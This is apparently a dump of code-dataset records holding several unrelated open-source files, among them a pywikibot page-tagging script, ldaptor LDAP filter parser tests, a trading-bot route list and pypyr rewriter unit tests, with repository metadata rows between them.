# NOT followed by an interwiki/namespace prefix (wikt:, commons:, User:, ...).
ilh_search = r'\[\[\:(aa|ab|ace|ady|af|ak|als|am|an|ang|ar|arc|arz|as|ast|av|ay|az|azb|ba|bar|bat-smg|bcl|be|be-tarask|be-x-old|bg|bh|bi|bjn|bm|bn|bo|bpy|br|bs|bug|bxr|ca|cbk-zam|cdo|ce|ceb|ch|cho|chr|chy|ckb|co|cr|crh|cs|csb|cu|cv|cy|da|de|diq|dsb|dv|dz|ee|egl|eml|el|en|eo|es|et|eu|ext|fa|ff|fi|fiu-vro|fj|fo|fr|frp|frr|fur|fy|ga|gag|gan|gd|gl|glk|gn|gom|got|gsw|als|gu|gv|ha|hak|haw|he|hi|hif|ho|hr|hsb|ht|hu|hy|hz|ia|id|ie|ig|ii|ik|ilo|io|is|it|iu|ja|jp|jam|jbo|jv|ka|kaa|kab|kbd|kg|ki|kj|kk|kl|km|kn|ko|koi|kr|krc|ks|ksh|ku|kv|kw|ky|la|lad|lb|lbe|lez|lg|li|lij|lmo|ln|lo|lrc|lt|ltg|lv|lzh|zh-classical|mai|map-bms|mdf|mg|mh|mhr|mi|min|mk|ml|mn|mo|mr|mrj|ms|mt|mus|mwl|my|myv|mzn|na|nah|nan|zh-min-nan|nap|nb|no|nds|nds-nl|ne|ne|new|ng|nl|nn|no|nov|nrm|nso|nv|ny|oc|olo|om|or|os|pa|pag|pam|pap|pcd|pdc|pfl|pi|pih|pl|pms|pnb|pnt|ps|pt|qu|rm|rmy|rn|ro|roa-rup|roa-tara|ru|rue|rup|rw|sa|sah|sc|scn|sco|sd|se|sg|sgs|sh|si|simple|sk|sl|sm|sn|so|sq|sr|srn|ss|st|stq|su|sv|sw|szl|ta|tcy|te|tet|tg|th|ti|tk|tl|tn|to|tpi|tr|ts|tt|tum|tw|ty|tyv|udm|ug|uk|ur|uz|ve|vec|vep|vi|vls|vo|vro|wa|war|wo|wuu|xal|xh|xmf|yi|yo|yue|zh-yue|za|zea|zu)\:(?!(wiktionary|wikt|wikinews|n|wikibooks|b|wikiquote|q|wikisource|s|oldwikisource|species|wikispecies|wikiversity|v|betawikiversity|wikimedia|foundation|wmf|wikivoyage|voy|commons|c|meta|metawikipedia|m|strategy|incubator|mediawikiwiki|mw|mediawiki|quality|otrswiki|otrs|ticket|phabricator|bugzilla|mediazilla|phab|nost|testwiki|wikidata|d|outreach|outreachwiki|toollabs|wikitech|dbdump|download|gerrit|mail|mailarchive|rev|spcom|sulutil|svn|tools|tswiki|wm2016|wm2017|wmania|User|Wikipedia|MediaWiki|Template|Help|File|Image|WP|Project|U|Special|利用者)\:)'
# Same pattern, additionally rejecting matches that sit inside a
# {{Translating}}-family template invocation.  Built by prefixing the
# shared pattern with a variable-width negative look-behind (which is why
# the "regex" package is needed instead of stdlib "re").
ilh = r'(?<!\{\{(Advtranslation|Plant\-translation|Translate|Translating|Translation[ _]+WIP|Translation|Trans|Tran|Voltranslation|Wptranslation|正在翻(譯|译)|(翻)?(譯|译)(中)?)[^\}]*)' + ilh_search
count = 0
gen0 = site.search(ilh_search0, namespaces=0)
#ilh_search is too long for site.search and leads to "pywikibot.data.api.APIError: cirrussearch-query-too-long".
gen1 = pagegenerators.RegexBodyFilterPageGenerator(gen0, ilh_search, quantifier='any')
#ilh would cause "re.error: look-behind requires fixed-width pattern" because RegexBodyFilterPageGenerator uses "re" rather than "regex" package.
gen = pagegenerators.RegexBodyFilterPageGenerator(gen1, r'\{\{Link style', quantifier='none')
#Skip pages already carrying {{Link style}}.
# Tag every remaining page whose body really matches the strict pattern
# with {{subst:Link style/auto}} at the top, then save with a bot summary.
for page in gen:
    count += 1
    art_txt = page.text
    # Re-check with the full look-behind pattern (case-insensitive); the
    # generator filter above used the weaker look-behind-free pattern.
    ilh_list = re.findall(ilh, art_txt, re.I)
    print(count, page.title(), len(ilh_list))
    if not ilh_list:
        continue
    page.text = '{{subst:Link style/auto}}\n' + art_txt
    page.save(u"機器人:標記不合[[WP:MOSIW|跨語言連結規範]]之頁面")
print('Done')
| 153.133333
| 1,846
| 0.751197
| 970
| 4,594
| 3.545361
| 0.48866
| 0.007851
| 0.010468
| 0.013376
| 0.754289
| 0.754289
| 0.733934
| 0.733934
| 0.733934
| 0.733934
| 0
| 0.006024
| 0.02438
| 4,594
| 30
| 1,847
| 153.133333
| 0.761267
| 0.081193
| 0
| 0
| 0
| 0.1
| 0.863679
| 0.848506
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.15
| 0
| 0.15
| 0.1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
d24aa78c3f67083c72f8a9e249dd829206a5de58
| 22,579
|
py
|
Python
|
ldaptor/test/test_ldapfilter.py
|
arossert/ldaptor
|
6ed55a380f05dd47aa0d03ead0ff214e26399df0
|
[
"MIT"
] | null | null | null |
ldaptor/test/test_ldapfilter.py
|
arossert/ldaptor
|
6ed55a380f05dd47aa0d03ead0ff214e26399df0
|
[
"MIT"
] | null | null | null |
ldaptor/test/test_ldapfilter.py
|
arossert/ldaptor
|
6ed55a380f05dd47aa0d03ead0ff214e26399df0
|
[
"MIT"
] | null | null | null |
"""
Test cases for ldaptor.protocols.ldap.ldapfilter module.
"""
from twisted.trial import unittest
from ldaptor.protocols import pureldap
from ldaptor import ldapfilter
class RFC2254Examples(unittest.TestCase):
    """Round-trip the example filters from RFC 2254.

    Each case checks that the textual filter parses into the expected
    pureldap object tree and, where the rendering is canonical, that the
    tree renders back to the original text via asText().
    """
    def _assert_roundtrip(self, source, expected):
        # Parse must yield the expected tree; asText must reproduce the input.
        self.assertEqual(ldapfilter.parseFilter(source), expected)
        self.assertEqual(expected.asText(), source)
    def test_cn(self):
        self._assert_roundtrip(
            '(cn=Babs Jensen)',
            pureldap.LDAPFilter_equalityMatch(
                attributeDesc=pureldap.LDAPAttributeDescription(value='cn'),
                assertionValue=pureldap.LDAPAssertionValue(value='Babs Jensen')))
    def test_not_cn(self):
        self._assert_roundtrip(
            '(!(cn=Tim Howes))',
            pureldap.LDAPFilter_not(
                pureldap.LDAPFilter_equalityMatch(
                    attributeDesc=pureldap.LDAPAttributeDescription(value='cn'),
                    assertionValue=pureldap.LDAPAssertionValue(value='Tim Howes'))))
    def test_and_or(self):
        expected = pureldap.LDAPFilter_and([
            pureldap.LDAPFilter_equalityMatch(
                attributeDesc=pureldap.LDAPAttributeDescription(value='objectClass'),
                assertionValue=pureldap.LDAPAssertionValue(value='Person')),
            pureldap.LDAPFilter_or([
                pureldap.LDAPFilter_equalityMatch(
                    attributeDesc=pureldap.LDAPAttributeDescription(value='sn'),
                    assertionValue=pureldap.LDAPAssertionValue(value='Jensen')),
                pureldap.LDAPFilter_substrings(
                    type='cn',
                    substrings=[pureldap.LDAPFilter_substrings_initial(value='Babs J')]),
            ]),
        ])
        self._assert_roundtrip('(&(objectClass=Person)(|(sn=Jensen)(cn=Babs J*)))', expected)
    def test_substrings(self):
        self._assert_roundtrip(
            '(o=univ*of*mich*)',
            pureldap.LDAPFilter_substrings(
                type='o',
                substrings=[pureldap.LDAPFilter_substrings_initial(value='univ'),
                            pureldap.LDAPFilter_substrings_any(value='of'),
                            pureldap.LDAPFilter_substrings_any(value='mich')]))
    def test_extensible_1(self):
        self._assert_roundtrip(
            '(cn:1.2.3.4.5:=Fred Flintstone)',
            pureldap.LDAPFilter_extensibleMatch(
                type='cn',
                dnAttributes=False,
                matchingRule='1.2.3.4.5',
                matchValue='Fred Flintstone'))
    def test_extensible_2(self):
        self._assert_roundtrip(
            '(sn:dn:2.4.6.8.10:=Barney Rubble)',
            pureldap.LDAPFilter_extensibleMatch(
                type='sn',
                dnAttributes=True,
                matchingRule='2.4.6.8.10',
                matchValue='Barney Rubble'))
    def test_extensible_3(self):
        self._assert_roundtrip(
            '(o:dn:=Ace Industry)',
            pureldap.LDAPFilter_extensibleMatch(
                type='o',
                dnAttributes=True,
                matchingRule=None,
                matchValue='Ace Industry'))
    def test_extensible_4(self):
        self._assert_roundtrip(
            '(:dn:2.4.6.8.10:=Dino)',
            pureldap.LDAPFilter_extensibleMatch(
                type=None,
                dnAttributes=True,
                matchingRule='2.4.6.8.10',
                matchValue='Dino'))
    def test_extensible_5(self):
        # Rendering only -- presumably the parse comparison is omitted
        # because dnAttributes=None is not what parseFilter produces.
        expected = pureldap.LDAPFilter_extensibleMatch(
            type='cn',
            dnAttributes=None,
            matchingRule='1.2.3.4.5',
            matchValue='Fred Flintstone')
        self.assertEqual(expected.asText(), '(cn:1.2.3.4.5:=Fred Flintstone)')
    def test_escape_parens(self):
        self._assert_roundtrip(
            r'(o=Parens R Us \28for all your parenthetical needs\29)',
            pureldap.LDAPFilter_equalityMatch(
                attributeDesc=pureldap.LDAPAttributeDescription(value='o'),
                assertionValue=pureldap.LDAPAssertionValue(value='Parens R Us (for all your parenthetical needs)')))
    def test_escape_asterisk(self):
        source = r'(cn=*\2A*)'
        expected = pureldap.LDAPFilter_substrings(
            type='cn',
            substrings=[pureldap.LDAPFilter_substrings_any(value='*')])
        self.assertEqual(ldapfilter.parseFilter(source), expected)
        # The rendered form uses a lower-case hex escape, hence the lower().
        self.assertEqual(expected.asText(), source.lower())
    def test_escape_backslash(self):
        self._assert_roundtrip(
            r'(filename=C:\5cMyFile)',
            pureldap.LDAPFilter_equalityMatch(
                attributeDesc=pureldap.LDAPAttributeDescription(value='filename'),
                assertionValue=pureldap.LDAPAssertionValue(value=r'C:\MyFile')))
    def test_escape_binary(self):
        # Parse-only: no asText round-trip is asserted for binary escapes.
        expected = pureldap.LDAPFilter_equalityMatch(
            attributeDesc=pureldap.LDAPAttributeDescription(value='bin'),
            assertionValue=pureldap.LDAPAssertionValue(value='\00\00\00\04'))
        self.assertEqual(ldapfilter.parseFilter(r'(bin=\00\00\00\04)'), expected)
    def test_escape_utf8(self):
        # Parse-only: the asText round-trip was left unasserted upstream.
        expected = pureldap.LDAPFilter_equalityMatch(
            attributeDesc=pureldap.LDAPAttributeDescription(value='sn'),
            assertionValue=pureldap.LDAPAssertionValue(value='Lu\xc4\x8di\xc4\x87'))
        self.assertEqual(ldapfilter.parseFilter(r'(sn=Lu\c4\8di\c4\87)'), expected)
class TestValid(unittest.TestCase):
    """Well-formed filters must parse and render back to the original text."""
    def _roundtrip(self, source, expected):
        # Parse and rendering must both agree with the input text.
        self.assertEqual(ldapfilter.parseFilter(source), expected)
        self.assertEqual(expected.asText(), source)
    def _cn_equals(self, value):
        """Equality-match filter cn=<value>."""
        return pureldap.LDAPFilter_equalityMatch(
            attributeDesc=pureldap.LDAPAttributeDescription(value='cn'),
            assertionValue=pureldap.LDAPAssertionValue(value=value))
    def _cn_substrings(self, *parts):
        """Substrings filter on cn built from the given components."""
        return pureldap.LDAPFilter_substrings(type='cn', substrings=list(parts))
    def test_item_present(self):
        self._roundtrip(r'(cn=*)', pureldap.LDAPFilter_present(value='cn'))
    def test_item_simple(self):
        self._roundtrip(r'(cn=foo)', self._cn_equals('foo'))
    def test_item_substring_init(self):
        init = pureldap.LDAPFilter_substrings_initial
        self._roundtrip(r'(cn=foo*)', self._cn_substrings(init('foo')))
    def test_item_substring_final(self):
        fin = pureldap.LDAPFilter_substrings_final
        self._roundtrip(r'(cn=*foo)', self._cn_substrings(fin('foo')))
    def test_item_substring_any(self):
        anyp = pureldap.LDAPFilter_substrings_any
        self._roundtrip(r'(cn=*foo*)', self._cn_substrings(anyp('foo')))
    def test_item_substring_aa(self):
        anyp = pureldap.LDAPFilter_substrings_any
        self._roundtrip(r'(cn=*foo*bar*)', self._cn_substrings(anyp('foo'), anyp('bar')))
    def test_item_substring_ia(self):
        init = pureldap.LDAPFilter_substrings_initial
        anyp = pureldap.LDAPFilter_substrings_any
        self._roundtrip(r'(cn=foo*bar*)', self._cn_substrings(init('foo'), anyp('bar')))
    def test_item_substring_iaa(self):
        init = pureldap.LDAPFilter_substrings_initial
        anyp = pureldap.LDAPFilter_substrings_any
        self._roundtrip(r'(cn=foo*bar*baz*)',
                        self._cn_substrings(init('foo'), anyp('bar'), anyp('baz')))
    def test_item_substring_if(self):
        init = pureldap.LDAPFilter_substrings_initial
        fin = pureldap.LDAPFilter_substrings_final
        self._roundtrip(r'(cn=foo*bar)', self._cn_substrings(init('foo'), fin('bar')))
    def test_item_substring_iaf(self):
        init = pureldap.LDAPFilter_substrings_initial
        anyp = pureldap.LDAPFilter_substrings_any
        fin = pureldap.LDAPFilter_substrings_final
        self._roundtrip(r'(cn=foo*bar*baz)',
                        self._cn_substrings(init('foo'), anyp('bar'), fin('baz')))
    def test_item_substring_iaaf(self):
        init = pureldap.LDAPFilter_substrings_initial
        anyp = pureldap.LDAPFilter_substrings_any
        fin = pureldap.LDAPFilter_substrings_final
        self._roundtrip(r'(cn=foo*bar*baz*quux)',
                        self._cn_substrings(init('foo'), anyp('bar'), anyp('baz'), fin('quux')))
    def test_item_substring_af(self):
        anyp = pureldap.LDAPFilter_substrings_any
        fin = pureldap.LDAPFilter_substrings_final
        self._roundtrip(r'(cn=*foo*bar)', self._cn_substrings(anyp('foo'), fin('bar')))
    def test_item_substring_aaf(self):
        anyp = pureldap.LDAPFilter_substrings_any
        fin = pureldap.LDAPFilter_substrings_final
        self._roundtrip(r'(cn=*foo*bar*baz)',
                        self._cn_substrings(anyp('foo'), anyp('bar'), fin('baz')))
    def test_not_item(self):
        self._roundtrip(r'(!(cn=foo))', pureldap.LDAPFilter_not(self._cn_equals('foo')))
    def test_or_item(self):
        self._roundtrip(r'(|(cn=foo)(cn=bar))',
                        pureldap.LDAPFilter_or([self._cn_equals('foo'),
                                                self._cn_equals('bar')]))
    def test_and_item(self):
        self._roundtrip(r'(&(cn=foo)(cn=bar))',
                        pureldap.LDAPFilter_and([self._cn_equals('foo'),
                                                 self._cn_equals('bar')]))
    def test_andornot(self):
        init = pureldap.LDAPFilter_substrings_initial
        anyp = pureldap.LDAPFilter_substrings_any
        fin = pureldap.LDAPFilter_substrings_final
        expected = pureldap.LDAPFilter_and([
            pureldap.LDAPFilter_not(
                pureldap.LDAPFilter_or([self._cn_equals('foo'),
                                        self._cn_equals('bar')])),
            pureldap.LDAPFilter_substrings(
                type='sn',
                substrings=[init('a'), anyp('b'), anyp('c'), fin('d')]),
        ])
        self._roundtrip(r'(&(!(|(cn=foo)(cn=bar)))(sn=a*b*c*d))', expected)
    def test_whitespace_beforeCloseParen(self):
        # Trailing space is part of the assertion value, not ignored.
        self._roundtrip(r'(cn=foo )', self._cn_equals('foo '))
    def test_whitespace_afterEq(self):
        # Leading space is part of the assertion value, not ignored.
        self._roundtrip(r'(cn= foo)', self._cn_equals(' foo'))
class TestInvalid(unittest.TestCase):
    """Malformed filter strings must raise InvalidLDAPFilter."""
    def _assert_invalid(self, source):
        self.assertRaises(ldapfilter.InvalidLDAPFilter,
                          ldapfilter.parseFilter, source)
    # Stray / unbalanced closing parentheses.
    def test_closeParen_1(self):
        self._assert_invalid('(&(|(mail=)@*)(uid=)))(mail=*))')
    def test_closeParen_2(self):
        self._assert_invalid('(|(mail=)@*)(uid=)))')
    def test_closeParen_3(self):
        self._assert_invalid('(mail=)@*)')
    def test_closeParen_4(self):
        self._assert_invalid('(uid=))')
    # Unescaped opening parentheses inside values.
    def test_openParen_1(self):
        self._assert_invalid('(&(|(mail=(@*)(uid=())(mail=*))')
    def test_openParen_2(self):
        self._assert_invalid('(|(mail=(@*)(uid=())')
    def test_openParen_3(self):
        self._assert_invalid('(mail=(@*)')
    def test_openParen_4(self):
        self._assert_invalid('(uid=()')
    # Whitespace is not tolerated outside the assertion value.
    def test_whitespace_leading(self):
        self._assert_invalid(r' (cn=foo)')
    def test_whitespace_trailing(self):
        self._assert_invalid(r'(cn=foo) ')
    def test_whitespace_afterOpenParen(self):
        self._assert_invalid(r'( cn=foo)')
    def test_whitespace_beforeEq(self):
        self._assert_invalid(r'(cn =foo)')
class TestMaybeSubstring(unittest.TestCase):
    """parseMaybeSubstring('cn', ...): a bare assertion value becomes a
    present, equality, or substrings filter depending on its asterisks."""
    def _parse(self, source):
        return ldapfilter.parseMaybeSubstring('cn', source)
    def _check_substrings(self, source, *parts):
        expected = pureldap.LDAPFilter_substrings(type='cn', substrings=list(parts))
        self.assertEqual(self._parse(source), expected)
    def test_item_present(self):
        self.assertEqual(self._parse(r'*'), pureldap.LDAPFilter_present(value='cn'))
    def test_item_simple(self):
        expected = pureldap.LDAPFilter_equalityMatch(
            attributeDesc=pureldap.LDAPAttributeDescription(value='cn'),
            assertionValue=pureldap.LDAPAssertionValue(value='foo'))
        self.assertEqual(self._parse(r'foo'), expected)
    def test_item_substring_init(self):
        init = pureldap.LDAPFilter_substrings_initial
        self._check_substrings(r'foo*', init('foo'))
    def test_item_substring_final(self):
        fin = pureldap.LDAPFilter_substrings_final
        self._check_substrings(r'*foo', fin('foo'))
    def test_item_substring_any(self):
        anyp = pureldap.LDAPFilter_substrings_any
        self._check_substrings(r'*foo*', anyp('foo'))
    def test_item_substring_aa(self):
        anyp = pureldap.LDAPFilter_substrings_any
        self._check_substrings(r'*foo*bar*', anyp('foo'), anyp('bar'))
    def test_item_substring_ia(self):
        init = pureldap.LDAPFilter_substrings_initial
        anyp = pureldap.LDAPFilter_substrings_any
        self._check_substrings(r'foo*bar*', init('foo'), anyp('bar'))
    def test_item_substring_iaa(self):
        init = pureldap.LDAPFilter_substrings_initial
        anyp = pureldap.LDAPFilter_substrings_any
        self._check_substrings(r'foo*bar*baz*', init('foo'), anyp('bar'), anyp('baz'))
    def test_item_substring_if(self):
        init = pureldap.LDAPFilter_substrings_initial
        fin = pureldap.LDAPFilter_substrings_final
        self._check_substrings(r'foo*bar', init('foo'), fin('bar'))
    def test_item_substring_iaf(self):
        init = pureldap.LDAPFilter_substrings_initial
        anyp = pureldap.LDAPFilter_substrings_any
        fin = pureldap.LDAPFilter_substrings_final
        self._check_substrings(r'foo*bar*baz', init('foo'), anyp('bar'), fin('baz'))
    def test_item_substring_iaaf(self):
        init = pureldap.LDAPFilter_substrings_initial
        anyp = pureldap.LDAPFilter_substrings_any
        fin = pureldap.LDAPFilter_substrings_final
        self._check_substrings(r'foo*bar*baz*quux',
                               init('foo'), anyp('bar'), anyp('baz'), fin('quux'))
    def test_item_substring_af(self):
        anyp = pureldap.LDAPFilter_substrings_any
        fin = pureldap.LDAPFilter_substrings_final
        self._check_substrings(r'*foo*bar', anyp('foo'), fin('bar'))
    def test_item_substring_aaf(self):
        anyp = pureldap.LDAPFilter_substrings_any
        fin = pureldap.LDAPFilter_substrings_final
        self._check_substrings(r'*foo*bar*baz', anyp('foo'), anyp('bar'), fin('baz'))
    def test_escape_simple(self):
        # \2a unescapes to a literal asterisk, so this stays an equality match.
        expected = pureldap.LDAPFilter_equalityMatch(
            attributeDesc=pureldap.LDAPAttributeDescription(value='cn'),
            assertionValue=pureldap.LDAPAssertionValue(value='f*oo(bar'))
        self.assertEqual(self._parse(r'f\2aoo(bar'), expected)
class TestWhitespace(unittest.TestCase):
def test_escape(self):
self.assertRaises(ldapfilter.InvalidLDAPFilter,
ldapfilter.parseFilter,
r'(cn=\ 61)')
| 41.735675
| 111
| 0.60171
| 2,056
| 22,579
| 6.455253
| 0.071984
| 0.161392
| 0.175105
| 0.086799
| 0.896022
| 0.873192
| 0.860986
| 0.857821
| 0.824593
| 0.800708
| 0
| 0.005995
| 0.283405
| 22,579
| 540
| 112
| 41.812963
| 0.814277
| 0.004163
| 0
| 0.707006
| 0
| 0
| 0.06629
| 0.010322
| 0
| 0
| 0
| 0
| 0.233546
| 1
| 0.127389
| false
| 0.042463
| 0.006369
| 0
| 0.144374
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d24cbebbd3012a588990d77daa93d4be7a96d6fe
| 757
|
py
|
Python
|
playground/optimization/ott2butKAMA2-serenity/routes.py
|
ysdede/jesse_strategies
|
ade9f4ba42cec11207c766d267b9d8feb8bce648
|
[
"CC0-1.0"
] | 38
|
2021-09-18T15:33:28.000Z
|
2022-02-21T17:29:08.000Z
|
playground/optimization/ott2butKAMA2-serenity/routes.py
|
ysdede/jesse_strategies
|
ade9f4ba42cec11207c766d267b9d8feb8bce648
|
[
"CC0-1.0"
] | 4
|
2022-01-02T14:46:12.000Z
|
2022-02-16T18:39:41.000Z
|
playground/optimization/ott2butKAMA2-serenity/routes.py
|
ysdede/jesse_strategies
|
ade9f4ba42cec11207c766d267b9d8feb8bce648
|
[
"CC0-1.0"
] | 11
|
2021-10-19T06:21:43.000Z
|
2022-02-21T17:29:10.000Z
|
routes = [
# ('Binance Futures', 'ANCHOR!', '5m', 'Ott2butKAMAposs', 'c@Rr9.'),
('Binance Futures', 'FTM-USDT', '5m', 'Ott2butKAMAposs', 'c@Rr9.'),
('Binance Futures', 'BLZ-USDT', '5m', 'Ott2butKAMAposs', 'c@Rr9.'),
('Binance Futures', 'ETH-USDT', '5m', 'Ott2butKAMAposs', 'c@Rr9.'),
('Binance Futures', 'ZIL-USDT', '5m', 'Ott2butKAMAposs', 'c@Rr9.'),
('Binance Futures', 'TRX-USDT', '5m', 'Ott2butKAMAposs', 'c@Rr9.'),
('Binance Futures', 'LINK-USDT', '5m', 'Ott2butKAMAposs', 'c@Rr9.'),
('Binance Futures', 'VET-USDT', '5m', 'Ott2butKAMAposs', 'c@Rr9.'),
('Binance Futures', 'SOL-USDT', '5m', 'Ott2butKAMAposs', 'c@Rr9.'),
('Binance Futures', 'DOGE-USDT', '5m', 'Ott2butKAMAposs', 'c@Rr9.'),
]
extra_candles = []
| 47.3125
| 72
| 0.581242
| 82
| 757
| 5.353659
| 0.243902
| 0.318907
| 0.410023
| 0.47836
| 0.84738
| 0.790433
| 0.710706
| 0
| 0
| 0
| 0
| 0.046368
| 0.14531
| 757
| 15
| 73
| 50.466667
| 0.632148
| 0.087186
| 0
| 0
| 0
| 0
| 0.604651
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d258df3b5bad12d5ce5d83fdfdf44febdfa1eb58
| 107
|
py
|
Python
|
modelscript/scripts/textblocks/all.py
|
ScribesZone/ModelScribes
|
a36be1047283f2e470dc2dd4353f2a714377bb7d
|
[
"MIT"
] | 1
|
2019-02-22T14:27:06.000Z
|
2019-02-22T14:27:06.000Z
|
modelscript/scripts/textblocks/all.py
|
ScribesZone/ModelScribes
|
a36be1047283f2e470dc2dd4353f2a714377bb7d
|
[
"MIT"
] | 4
|
2015-12-18T10:30:02.000Z
|
2015-12-18T10:36:28.000Z
|
modelscript/scripts/textblocks/all.py
|
ScribesZone/ModelScribes
|
a36be1047283f2e470dc2dd4353f2a714377bb7d
|
[
"MIT"
] | null | null | null |
# coding=utf-8
import modelscript.scripts.textblocks.parser
import modelscript.scripts.textblocks.printer
| 21.4
| 45
| 0.850467
| 13
| 107
| 7
| 0.692308
| 0.373626
| 0.527473
| 0.747253
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.01
| 0.065421
| 107
| 4
| 46
| 26.75
| 0.9
| 0.11215
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0.5
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 1
|
0
| 9
|
d2650dd2f2211c7d036080bbf5cde12de4667688
| 114
|
py
|
Python
|
bin/test/test_directory_structure.py
|
vatervonacht/dagster
|
595d78c883ef20618052ac1575fe46cde51fd541
|
[
"Apache-2.0"
] | 3
|
2020-04-28T16:27:33.000Z
|
2020-07-22T07:43:30.000Z
|
bin/test/test_directory_structure.py
|
vatervonacht/dagster
|
595d78c883ef20618052ac1575fe46cde51fd541
|
[
"Apache-2.0"
] | null | null | null |
bin/test/test_directory_structure.py
|
vatervonacht/dagster
|
595d78c883ef20618052ac1575fe46cde51fd541
|
[
"Apache-2.0"
] | 1
|
2021-02-21T12:16:47.000Z
|
2021-02-21T12:16:47.000Z
|
from ..publish import check_directory_structure
def test_directory_structure():
check_directory_structure()
| 19
| 47
| 0.824561
| 13
| 114
| 6.769231
| 0.615385
| 0.613636
| 0.522727
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.114035
| 114
| 5
| 48
| 22.8
| 0.871287
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
d27d7ad546c79136b62fbadead09c4fcd4138d55
| 18,426
|
py
|
Python
|
tests/unit/pypyr/steps/dsl/fileinoutrewriter_test.py
|
pypyr/pypyr-cli
|
dc0f694ac0c0e3c2844c1a20788c9af586a8a16e
|
[
"Apache-2.0"
] | 31
|
2017-03-24T11:27:34.000Z
|
2020-05-27T20:06:28.000Z
|
tests/unit/pypyr/steps/dsl/fileinoutrewriter_test.py
|
pypyr/pypyr-cli
|
dc0f694ac0c0e3c2844c1a20788c9af586a8a16e
|
[
"Apache-2.0"
] | 89
|
2017-04-12T09:50:32.000Z
|
2020-08-13T13:18:36.000Z
|
tests/unit/pypyr/steps/dsl/fileinoutrewriter_test.py
|
pypyr/pypyr-cli
|
dc0f694ac0c0e3c2844c1a20788c9af586a8a16e
|
[
"Apache-2.0"
] | 6
|
2017-06-04T14:19:59.000Z
|
2020-02-10T13:16:40.000Z
|
"""fileinoutrewriter.py unit tests."""
import pytest
from unittest.mock import call, Mock, patch
from pypyr.context import Context
from pypyr.errors import KeyNotInContextError
from pypyr.steps.dsl.fileinoutrewriter import (FileInRewriterStep,
ObjectRewriterStep,
StreamRewriterStep,
StreamReplacePairsRewriterStep)
from pypyr.utils.filesystem import (ObjectRepresenter,
ObjectRewriter,
FileRewriter,
StreamRewriter)
# region FileInRewriterStep
def test_fileinrewriterstep_root_required():
"""Key root must exist."""
context = Context({'root': 'blah'})
with pytest.raises(KeyNotInContextError) as err:
FileInRewriterStep('blah.name', 'Xroot', context)
assert str(err.value) == (
"context['Xroot'] doesn't exist. It must exist for blah.name.")
def test_fileinrewriterstep_in_required():
"""Key in must exist."""
context = Context({'root': 'blah'})
with pytest.raises(KeyNotInContextError) as err:
FileInRewriterStep('blah.name', 'root', context)
assert str(err.value) == ("context['root']['in'] "
"doesn't exist. It must exist for "
"blah.name.")
def test_fileinrewriterstep_in_not_out():
"""File rewriter step instantiates with in but no out."""
context = Context({'root': {'in': 'inpathhere'}})
obj = FileInRewriterStep('blah.name', 'root', context)
assert obj.path_in == 'inpathhere'
assert not obj.path_out
assert obj.context == context
assert obj.logger.name == 'blah.name'
def test_fileinrewriterstep_in_and_out():
"""File rewriter step instantiates with in and out."""
context = Context({'root': {'in': 'inpathhere', 'out': 'outpathhere'}})
obj = FileInRewriterStep('blah.name', 'root', context)
assert obj.path_in == 'inpathhere'
assert obj.path_out == 'outpathhere'
assert obj.context == context
assert obj.logger.name == 'blah.name'
def test_fileinrewriterstep_in_and_out_with_formatting():
"""File rewriter step instantiates with in and out applies formatting."""
context = Context({'k1': 'v1',
'root': {'in': 'inpath{k1}here',
'out': 'outpath{k1}here'}})
obj = FileInRewriterStep('blah.name', 'root', context)
assert obj.path_in == 'inpathv1here'
assert obj.path_out == 'outpathv1here'
assert obj.context == context
assert obj.logger.name == 'blah.name'
def test_fileinrewriterstep_in_list_and_out_with_formatting():
"""File rewriter step instantiates in list & out applies formatting."""
context = Context({'k1': 'v1',
'root': {'in': ['inpath{k1}here', '2', '{k1}'],
'out': 'outpath{k1}here'}})
obj = FileInRewriterStep('blah.name', 'root', context)
assert obj.path_in == ['inpathv1here', '2', 'v1']
assert obj.path_out == 'outpathv1here'
assert obj.context == context
assert obj.logger.name == 'blah.name'
def test_fileinrewriterstep_run_step():
"""File rewriter runs files_in_to_out on rewriter."""
context = Context({'root': {'in': 'inpathhere', 'out': 'outpathhere'}})
obj = FileInRewriterStep('blah.name', 'root', context)
assert obj.path_in == 'inpathhere'
assert obj.path_out == 'outpathhere'
assert obj.context == context
assert obj.logger.name == 'blah.name'
mock_rewriter = Mock(spec=FileRewriter)
obj.run_step(mock_rewriter)
mock_rewriter.files_in_to_out.assert_called_once_with(
in_path='inpathhere',
out_path='outpathhere')
def test_fileinrewriterstep_run_step_no_out():
